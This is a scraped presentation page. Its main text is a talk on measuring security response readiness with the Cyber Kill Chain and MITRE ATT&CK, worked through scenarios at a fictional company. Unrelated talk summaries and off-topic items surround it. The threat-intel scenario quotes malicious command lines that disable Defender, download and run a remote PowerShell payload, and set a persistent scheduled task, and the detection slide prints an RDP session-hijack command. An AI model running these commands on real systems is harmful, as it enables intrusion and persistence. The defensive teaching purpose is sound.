This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report and decide on future of the company's toolset where you will be able to answer a question if you should continue investing in a tool or should you buy a new one.
APNIC Senior Security Specialist Adli Wahid presented on the APNIC Honeynet Project, interesting observations, mitigation and multistakeholder collaboration at Threat Con 2021, held online from 8 to 11 September 2021.
The document provides an overview of techniques for penetrating OS X environments externally, including using the EmPyre remote access Trojan, phishing with OS X payloads, privilege escalation, persistence mechanisms like login hooks and crontab, host and network reconnaissance tools, and lateral movement options like SSH. The challenges of operating in an OS X environment and adapting typical Windows tactics are also discussed.
This document discusses various web application security topics including SQL injection, cross-site request forgery (CSRF), cross-site scripting (XSS), session tokens, and cookies. It provides examples of each type of attack, how they work, their impact, and strategies for prevention. Specific topics covered include SQL injection examples using single quotes, comments, and dropping tables; CSRF examples using bank transfers and router configuration; and XSS examples using persistent, reflected, and DOM-based techniques.
Nate Warfield, Microsoft
Ben Ridgway, Microsoft
MongoDB, Redis, Elastic, Hadoop, SMBv1, IIS6.0, Samba. What do they all have in common? Thousands of them were pwned. In Azure. In 2017. Attackers have shifted tactics, leveraged nation-state leaked tools and are leveraging ransomware to monetize their attacks. Cloud networks are prime targets; the DMZ is gone, the firewall doesn't exist and customers may not realize they've exposed insecure services to the internet until it's too late. In this talk we'll discuss hunting, finding and remediating compromised customer systems in Azure - a non-trivial task with 1.59million exposed hosts and counting. Remediating system compromise is only the first stage so we'll also cover how we applied the lessons learned to proactively secure Azure Marketplace.
The Dark Side of PowerShell by George DobreaEC-Council
PowerShell is now a ‘mandatory-to-use’ tool for IT professionals in order to automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language just because PowerShell it’s already installed on your Windows machines, trusted by Admins and most AntiVirus tools! The session presents the steps that should get you starting on (Ethical) Hacking and Pen Testing with PowerShell and some new techniques like JEA (Just Enough Administration) that a defender can use in order to limit the effectiveness of PowerShell attacks.
This document discusses advanced persistent threats (APTs) and strategies for cyber defense. It describes APTs as advanced, persistent, and threatening adversaries that are formally tasked to accomplish missions. The document outlines the lifecycle of APT attacks, including establishing backdoors in networks, maintaining long-term control, and exfiltrating data using encryption. It provides examples of APT groups and tools they use, such as exploiting vulnerabilities to escalate privileges and dump cached credentials from Windows networks. The overall summary is that APTs are dangerous, organized adversaries requiring persistent cyber defense strategies.
The document discusses various tools that can be integrated within the AlienVault USM platform. It categorizes the tools as either active or passive. Active tools generate their own network traffic while passive tools analyze existing network traffic without generating any themselves. It then provides details on the purpose and functionality of each tool, including Snort for intrusion detection, Ntop for network monitoring, Nagios for availability monitoring, OpenVas for vulnerability scanning, and others. It explains how each tool can be used within the AlienVault platform.
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE - ATT&CKcon
ATT&CK is valuable for those of us who are heads down in security day in and day out. But what about using ATT&CK to each college interns about security?
This presentation details how Tripwire used ATT&CK to build- out a new training regimen for summer interns. By going through and finding quick wins, Tripwire’s interns were actively engaged in learning about security. The detailed break downs of ATT&CK were greatly beneficial in helping teach security concepts to those who were not yet familiar with them. This session shows the program details and how you might be able to adapt it to your requirements.
The document provides an overview of the Endpoint Protection 10 solution from Sophos, including:
1) It protects against various threats like malware, adware, malicious URLs, and sensitive data leaks.
2) Protection is provided by SophosLabs active protection databases and techniques like application control, device control, and anonymizing proxies.
3) The solution includes endpoint software, Sophos Update Managers for updating endpoints, and the Sophos Enterprise Console for centralized management.
The document discusses various topics related to web application security including authenticating users, SSL protocol, padlock icons, user interface attacks, and Pretty Good Privacy (PGP). It provides details on cookie-based and token-based authentication, how SSL works to establish encrypted links, different padlock icons and what they indicate, types of user interface attacks like clickjacking and cursorjacking, and how PGP provides authentication, confidentiality, compression and compatibility for securing emails.
Attackers can quietly move laterally within networks by first gaining initial access, such as through phishing, then using tools and techniques to discover and access other systems on the network. This includes using powershell to run code without touching disks, download payloads from remote systems, and inject shellcode. It also involves using tools like mimikatz to dump credentials and move access from one system to another to gain higher privileges. The goal is often to compromise domain controllers to access domain admin credentials and gain full control.
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
The document outlines how to build an effective security program with limited resources as a one-person shop. It discusses establishing people and processes, designing a secure network architecture by dividing the network into zones and applying security controls at boundaries, securing system design through least privilege and centralized logging, performing continuous monitoring through vulnerability scanning and log analysis, obtaining external validation through auditing and penetration testing, and ensuring compliance through following security best practices and frameworks. The overall goal is to prioritize security based on risks through people-focused automation and standardization of processes.
CSW2017 chuanda ding_state of windows application securityCanSecWest
This document discusses shared libraries and security vulnerabilities in Windows applications. It describes a system called Project A'Tuin that can automatically install software, detect insecure behaviors, and identify shared libraries used. The system found over 4000 shared libraries in sample applications, including outdated versions of OpenSSL affected by known vulnerabilities. Future work includes expanding behavior detection across platforms and open sourcing the system.
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
The document provides an overview of the Browser Exploitation Framework (BeEF). It discusses how BeEF allows an attacker to control victims' browsers remotely by injecting a small JavaScript hook. This can enable the attacker to profile the victim's system, steal session cookies, redirect the browser, and run exploits or malware payloads. The document outlines how BeEF is installed and used, describes common attack vectors for injecting the hook like phishing and XSS, and demonstrates fingerprinting and attacking capabilities through its web interface modules.
This document discusses techniques for obfuscating URLs to hide malicious intent. It begins with an overview of URL shortening services that can be used to hide the destination of a link. Various methods for obfuscating URLs are then described, including encoding IP addresses in octal format, URL encoding, and tricks involving the URI structure. The document provides a challenge for safely deconstructing an obfuscated URL step-by-step either manually or automatically. It concludes with an explanation of how the challenge URL was obfuscated using chaining of different techniques.
This document discusses various techniques for exploiting Android devices, including injecting JavaScript code to install malware, tricking users into downloading malicious updates, abusing permissions to gain access to private data like contacts and location, and extracting user data like passwords through physical access to the device. It provides examples of exploiting vulnerabilities in apps to escalate privileges and infiltrate user accounts.
With the focus on security, most organisations test the security defenses via pen-testing. But what about after the network has been compromised. Is there an Advance Persistent Threat (APT) sitting on the network? Will the defenses be able to detect this?
This talk will discuss some of the open source tools that can help simulate this threat. So as to test the security defenses if an APT makes it onto the network.
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Attackers can use these tools along with techniques like ARP poisoning to conduct remote exploits or hack passwords on Windows systems.
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Common attack techniques explored include man-in-the-middle attacks using ARP poisoning, password cracking through tools like John the Ripper, and "Google hacking" to find sensitive information online.
Kunal - Introduction to backtrack - ClubHack2008ClubHack
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Common attack techniques explored include man-in-the-middle attacks using ARP poisoning, password cracking through tools like John the Ripper, and hacking web servers through techniques like Google hacking.
CyberCrime in the Cloud and How to defend Yourself Alert Logic
The document discusses cybercrime threats in the cloud and how to defend against them. It notes that traditional on-premises threats are moving to the cloud, with web application attacks and brute force attacks being most common. Honeypots are used to gather intelligence on attacks by simulating vulnerable systems. Analysis of honeypot data found increases in brute force attacks and vulnerability scans in cloud environments. The document recommends best practices like secure coding, access management, patch management, log review, and tools like firewalls and intrusion detection to help secure cloud environments.
A penetration test evaluates a system's security by simulating attacks. A web application penetration test focuses on a web application's security. The process involves actively analyzing the application for weaknesses, flaws, or vulnerabilities. Any issues found are reported to the owner along with impact assessments and mitigation proposals.
This vulnerability allows remote code execution if a target receives a specially crafted RPC request. An attacker could exploit it without authentication to run arbitrary code on Windows 2000, XP, and 2003 systems. Best practices like firewalls can help protect networks from outside attacks. The vulnerability is caused by unchecked buffers in the LSASS service.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
So you have deployed your web app to Azure. Now, how do you make it more secure and compliant?
In this fast-paced talk we will run through an overview of some of the Azure technologies that you can use to better protect your web applications in Azure - all depending on your required security level, of course. The talk will set out a framework for you to consider which protections you want to put in place and provide you with the awareness of the tools at your disposal.
https://www.lytzen.name/talks/Securing_web_apps_in_azure.html
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
I got 99 trends and a # is all of them or How we found over 100 200+ RCE vulnerabilities in Trend Micro software.
Presentation released at Hack In The Box 2017 Amsterdam, by Roberto Suggi Liverani @malerisch and Steven Seeley @steventseeley.
For more information, please visit: http://blog.malerisch.net or http://srcincite.io
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
This document provides information on various open source and low-cost security tools and solutions, including test email servers, phishing training modules, phishing frameworks, password checking tools, email alerts, network mapping tools, and more. It also lists free business intelligence software, and resources on avoiding business email compromise scams.
The document discusses vulnerability assessment and penetration testing (VAPT). It defines vulnerability assessment as systematically finding security issues in a network or system through scanning, and penetration testing as exploiting vulnerabilities to prove they can cause damage. The document outlines the types of VAPT testing, steps in the process, common tools used like Nmap and ZAP, and top vulnerabilities like SQL injection and XSS. It provides examples of specific vulnerabilities found like outdated themes and XML-RPC access, and their potential impacts and solutions.
This document provides an overview of an offensive cyber security engineer training program offered by infosectrain.com. The 120-hour instructor-led online program includes training in ethical hacking, penetration testing, cyber security tools and techniques. It aims to provide students with skills in areas like reconnaissance, scanning, vulnerability analysis, exploitation, post-exploitation, and reporting. The program covers topics such as Active Directory penetration testing, password cracking, and privilege escalation. It includes hands-on labs and prepares students for the EC-Council Certified Ethical Hacker certification exam.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
https://www.infosectrain.com/courses/offensive-cyber-security-engineer-training/
Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices.
Catch Me If You Can - Finding APTs in your networkDefCamp
Adrian Tudor & Leo Neagu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)sabaridaran1310
Introduction about genetic engineering
Steps in rDNA Technology
Screening of recombinants
Selection of recombinants
Blue and white screening
Alpha complementation
Beta galatosidase
X gal
Antibiotic resistance screening
Replica plate technique
Colony hybridization
Screening by Immunological assay
Immunological screening
Protein activity
Enzyme activity
MCQS RELATED TO SCREENING OF RECOMBINANTS
Generative AI technology is a fascinating field that focuses on creating comp...Nohoax Kanont
Generative AI technology is a fascinating field that focuses on creating computer models capable of generating new, original content. It leverages the power of large language models, neural networks, and machine learning to produce content that can mimic human creativity. This technology has seen a surge in innovation and adoption since the introduction of ChatGPT in 2022, leading to significant productivity benefits across various industries. With its ability to generate text, images, video, and audio, generative AI is transforming how we interact with technology and the types of tasks that can be automated.
Discover practical tips and tricks for streamlining your Marketo programs from end to end. Whether you're new to Marketo or looking to enhance your existing processes, our expert speakers will provide insights and strategies you can implement right away.
Using ScyllaDB for Real-Time Write-Heavy WorkloadsScyllaDB
Keeping latencies low for highly concurrent, intensive data ingestion
ScyllaDB’s “sweet spot” is workloads over 50K operations per second that require predictably low (e.g., single-digit millisecond) latency. And its unique architecture makes it particularly valuable for the real-time write-heavy workloads such as those commonly found in IoT, logging systems, real-time analytics, and order processing.
Join ScyllaDB technical director Felipe Cardeneti Mendes and principal field engineer, Lubos Kosco to learn about:
- Common challenges that arise with real-time write-heavy workloads
- The tradeoffs teams face and tips for negotiating them
- ScyllaDB architectural elements that support real-time write-heavy workloads
- How your peers are using ScyllaDB with similar workloads
Flame emission spectroscopy is an instrument used to determine concentration of metal ions in sample. Flame provide energy for excitation atoms introduced into flame. It involve components like sample delivery system, burner, sample, mirror, slits, monochromator, filter, detector (photomultiplier tube and photo tube detector). There are many interference involved during analysis of sample like spectral interference, ionisation interference, chemical interference ect. It can be used for both quantitative and qualitative study, determine lead in petrol, determine alkali and alkaline earth metal, determine fertilizer requirement for soil.
Network Auto Configuration and Correction using Python.pptxsaikumaresh2
- Implemented Zero Touch Provisioning, Network Topology Mapper, and Root Cause Analysis using Python, GNS3, Netmiko, SSH, OSPF, and Graphviz.
- Developed a Python script to automate network discovery based on Core Router IP and login details, significantly reducing manual intervention.
- Enhanced network visualization by generating detailed network graphs, aiding in quick network analysis and troubleshooting.
Welcome to our third live UiPath Community Day Amsterdam! Come join us for a half-day of networking and UiPath Platform deep-dives, for devs and non-devs alike, in the middle of summer ☀.
📕 Agenda:
12:30 Welcome Coffee/Light Lunch ☕
13:00 Event opening speech
Ebert Knol, Managing Partner, Tacstone Technology
Jonathan Smith, UiPath MVP, RPA Lead, Ciphix
Cristina Vidu, Senior Marketing Manager, UiPath Community EMEA
Dion Mes, Principal Sales Engineer, UiPath
13:15 ASML: RPA as Tactical Automation
Tactical robotic process automation for solving short-term challenges, while establishing standard and re-usable interfaces that fit IT's long-term goals and objectives.
Yannic Suurmeijer, System Architect, ASML
13:30 PostNL: an insight into RPA at PostNL
Showcasing the solutions our automations have provided, the challenges we’ve faced, and the best practices we’ve developed to support our logistics operations.
Leonard Renne, RPA Developer, PostNL
13:45 Break (30')
14:15 Breakout Sessions: Round 1
Modern Document Understanding in the cloud platform: AI-driven UiPath Document Understanding
Mike Bos, Senior Automation Developer, Tacstone Technology
Process Orchestration: scale up and have your Robots work in harmony
Jon Smith, UiPath MVP, RPA Lead, Ciphix
UiPath Integration Service: connect applications, leverage prebuilt connectors, and set up customer connectors
Johans Brink, CTO, MvR digital workforce
15:00 Breakout Sessions: Round 2
Automation, and GenAI: practical use cases for value generation
Thomas Janssen, UiPath MVP, Senior Automation Developer, Automation Heroes
Human in the Loop/Action Center
Dion Mes, Principal Sales Engineer @UiPath
Improving development with coded workflows
Idris Janszen, Technical Consultant, Ilionx
15:45 End remarks
16:00 Community fun games, sharing knowledge, drinks, and bites 🍻
Understanding the NFT marketplace ecosystem involves exploring platforms for creating, buying, selling, and trading digital assets. These platforms use blockchain technology for security and smart contracts for automated transactions. Key components include digital wallets, NFT standards, and marketplaces like OpenSea and Rarible. This ecosystem is shaped by the roles of creators, collectors, and developers, offering insights into the dynamics and trends of the digital asset economy.
Leading Bigcommerce Development Services for Online RetailersSynapseIndia
As a leading provider of Bigcommerce development services, we specialize in creating powerful, user-friendly e-commerce solutions. Our services help online retailers increase sales and improve customer satisfaction.
Airports, banks, stock exchanges, and countless other critical operations got thrown into chaos!
In an unprecedented event, a recent CrowdStrike update had caused a global IT meltdown, leading to widespread Blue Screen of Death (BSOD) errors, and crippling 8.5 million Microsoft Windows systems.
What triggered this massive disruption? How did Microsoft step in to provide a lifeline? And what are the next steps for recovery?
Swipe to uncover the full story, including expert insights and recovery steps for those affected.
Blue Screen Of Death | Windows Down | Biggest IT failure
How to measure your security response readiness?
1. How to measure your security response readiness?
Tomasz Jakubowski
@perunhimself
tomasz@shellsquad.com
2. Lockheed Martin Cyber Kill Chain® - recap
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-
martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
4. MITRE ATT&CK ™
• Website: https://attack.mitre.org
• Quote:
“MITRE ATT&CK™ is a globally-accessible knowledge base of
adversary tactics and techniques based on real-world observations.
The ATT&CK knowledge base is used as a foundation for the
development of specific threat models and methodologies in the
private sector, in government, and in the cybersecurity product and
service community.”
5. MITRE ATT&CK ™
Tactics Techniques
• Answers WHY an action is performed by an
adversary
• Provide useful context to individual techniques
• Answers HOW an adversary achieves a tactical
objective by performing an action (e.g. send
spearphising email with an attachment to gain
initial foothold)
• Useful information for both red and blue teams
MITRE ATT&CK ™
Tactics Techniques
• Answers WHY an action is performed by an
adversary
• Provide useful context to individual techniques
• Answers HOW an adversary achieves a tactical
objective by performing an action (e.g. send
spearphising email with an attachment to gain
initial foothold)
• Useful information for both red and blue teams
8. What is described
• Tactics (E: 12)
• Techniques (E: 266)
• Description
• Examples: Groups and/or software using this
technique
• Mitigation
• Detection
• References
• Groups (94)
• Description
• Aliases
• Techniques used
• Software used
• References
• Software (414)
• Description
• Techniques used
• Groups using it
• References
9. There are just
too many
techniques!
Shortlist!
eg. Industry > Groups > Techniques
11. The “Target”
• Fictional company (or maybe not)
https://www.sensenet-library.com
• Provides services available online
• AI constructs – they just live in cyberspace
• it’s critical for them to be online!
• Construct – a copy of consciousness allowing for immortal life
in cyberspace
• Keeps confidential data on their internal network
• You don’t want people breaking in and making copies of
customers’ constructs
13. Warm-up: Detection and Containment
Phase Detect Deny Disrupt Degrade Deceive Contain
Reconnaissance Firewall Honeypot
Weaponization NIPS
Delivery
Exploitation AV
Installation
Command & Control AV
Actions on Targets
LMCyberKillChain®
Countermeasures
14. Completed: Detection and Containment
Phase Detect Deny Disrupt Degrade Deceive Contain
Reconnaissance Web Analytics
Web logs
Router Logs
NIDS
Firewall Honeypot
Redirect Loop
Honeypot
Redirect Loops
Firewall
Weaponization NIDS NIPS NIPS
Delivery NIDS
HIDS
AV
Web Filter
Mail Filter
Inline AV
Mail Filter
Web Filter
Queuing
Sinkhole
Combination of
Deny/Disrupt
Honeypot App-Aware Firewall
Honeypot
Exploitation HIDS
NIDS
AV
Patch
AV
HIPS
Patch
AV
HIPS
Highly restricted User
Accounts
Honeypot Inter-Zone NIPS
Installation HIDS
Application Logs
AV
NetFlow
App Whitelisting
Blocked Execution
AV
HIPS
Combination of
Deny/Disrupt
Honeypot
Command & Control NIDS
HIDS
AV
Firewall
Sinkhole
NIPS
DEP
Sinkhole
Tarpit
Sinkhole
DNS Redirect
Sinkhole
Actions on Targets Audit Logs
DEP
AV
NIDS
HIDS
Firewall
Network Segmentation
DLP
Network Segmentation
HIPS
Network Segmentation Honeypot
LMCyberKillChain®
Countermeasures
15. Scenario 1: OMG! New vulnerability
• CVE-2029-0708 – Online Surrogate Service Remote Code Execution
• A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker
connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no
user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the
target surrogate that can lead to complete takeover of the surrogate.
• To exploit this vulnerability, an attacker would need to send a specially crafted request to the target
surrogate Online Surrogate Service via RDP.
• The update addresses the vulnerability by correcting how Online Surrogate Services handles connection
requests.
• You’ve checked – you have an old version of the software and you can’t patch right now due to some other
dependencies that need to be sorted out first
Publicly
Disclosed
Proof of
Concept
Exploited Latest Software
Release
Older Software
Release
Denial of
Service
Yes Yes Yes 4 – Not affected 1 – Exploitation
More Likely
No
17. T1076: Remote Desktop Protocol
• Mitigation
• Disable the RDP service if it is unnecessary,
• remove unnecessary accounts and groups from Remote Desktop Users groups,
• enable firewall rules to block RDP traffic between network security zones,
• Audit the Remote Desktop Users group membership regularly,
• Remove the local Administrators group from the list of groups allowed to log in through RDP,
• Limit remote user permissions if remote access is necessary,
• Use remote desktop gateways and multifactor authentication for remote logins,
• Do not leave RDP accessible from the internet,
• Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active,
• Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server,
• Detection
• Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity
that occurs after a remote login, may indicate suspicious or malicious behavior with RDP,
• Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short
period of time.
• set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP
session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack)
https://attack.mitre.org/techniques/T1076/
Groups using it: 16 Software using it: 8
18. • Multi-Stage Backdoor Dropper Document Possibly
Targeting Online Services Vendors Observed
• 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe
http://www.tinyurl[.]com/shlsqd
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped
JavaScript (JS) that performs the following actions:
1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures
2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe &
taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
4. Disables unsafe files being opened in protected view by writing to one of the following registry paths:
HKCUSoftwareMicrosoftOffice[11-
16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV
5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe
with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -
command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-
ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m
(window.close)
6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following
command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks
/create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta
vbscript:CreateObject("Wscript.Shell").Run("mshta.exe
https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
Scenario 2: Threat Intel Report
19. • Multi-Stage Backdoor Dropper Document Possibly
Targeting Online Services Vendors Observed
• 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe
http://www.tinyurl[.]com/shlsqd
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped
JavaScript (JS) that performs the following actions:
1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures
2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe &
taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
4. Disables unsafe files being opened in protected view by writing to one of the following registry paths:
HKCUSoftwareMicrosoftOffice[11-
16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV
5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe
with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -
command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-
ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m
(window.close)
6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following
command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks
/create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta
vbscript:CreateObject("Wscript.Shell").Run("mshta.exe
https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
Scenario 2: Threat Intel Report
T1193:
Spearphishing
Attachment
T1089:
Disabling
Security Tools
T1170:
MshtaT1481:
Web Service
T1053:
Scheduled Task
T1027:
Obfuscated
Files or
Information
T1064:
Scripting
T1086:
PowerShell
T1112:
Modify Registry
21. Maturity
0 = We do nothing
1 = Locally logged
Relevant data is captured on the endpoint
2 = Centrally logged
Data is gathered centrally
4 = Alerting
We have rules to detect anomalies, suspicious events
5 = Playbook exists
A process to respond exists (incl. analyse, contain, eradicate, recover)
6 = Response is automated
We have automated response for this alert
3 = Correlated / enriched
Logs for the event are enriched with data from other sources to increase fidelity
23. Scenario 3: It’s all about the money
• There is an ongoing trade war between 2 biggest economies in the world
• Unfortunately this has an impact on the wealthiest people who are
Sense//Net Library’s customers
• Few of them decided to put their AI constructs to sleep until better times
come hence your profits decrease
• The management decided it’s time to cut costs and your department needs
to participate
• You don’t want to cut people – they are a great team – so you focus on
vendor contracts that are going to be renewed this year – which security
control can you afford to get rid of?
24. Measure effectiveness of the toolset
MITRE ATT&CK techniques
Current
Early warning Inbound Protect Detect Outbound Protect
Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO
Tool1
Tool2
Tool3
Tool4
Tool5
Tool6
Tool7
Tool8
T1193: Spearphishing Attachment
T1089: Disabling Security Tools
T1112: Modify Registry
T1086: PowerShell
T1053: Scheduled Task
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
[2] Would Warn of Activity
[0] N/A
[2] Would Block Activity
[1] Could Block Activity
[0] Would Not Block Activity
[2] Would Detect Activity
[0] No Detection or N/A
[2] Would Block Outbound Traffic
[1] Could Have Blocked
[0] Would Not Block Activity
Shortlisted
Techniques
25. Measure effectiveness of the toolset
MITRE ATT&CK techniques
Current
Toolset measure
Early warning Inbound Protect Detect Outbound Protect
Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO
Tool1
Tool2
Tool3
Tool4
Tool5
Tool6
Tool7
Tool8
Current Proposed
T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7
T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8
T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7
T1086: PowerShell 2 0 0 2 2 0 2 1 9 8
T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7
44 37
100% 84%
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
[2] Would Warn of Activity
[0] N/A
[2] Would Block Activity
[1] Could Block Activity
[0] Would Not Block Activity
[2] Would Detect Activity
[0] No Detection or N/A
[2] Would Block Outbound Traffic
[1] Could Have Blocked
[0] Would Not Block Activity
26. Scenario 4: Let’s go shopping
• Times are changing and the company profits picked up
• You successfully argued to get a bigger budget and now you can
spend some money on a new security control
• Your team shortlisted a few vendors and you’ve conducted a PoC
• The results are that there a few differences in the products
• The procurement team negotiated almost similar prices for the
products
27. Measure effectiveness of the toolset
MITRE ATT&CK techniques
Current Future
Toolset measure
Early warning Inbound Protect Detect Outbound Protect
Proposed
Reconnaisance Weaponization, Delivery
Weaponization, Delivery,
C2
Exploit, Installation, C2,
AOO
Tool1
Tool2
Tool3
Tool4
Tool5
Tool6
Tool7
Tool8
ToolA
ToolB
Current
ProposedA
ProposedB
T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7
T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10
T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7
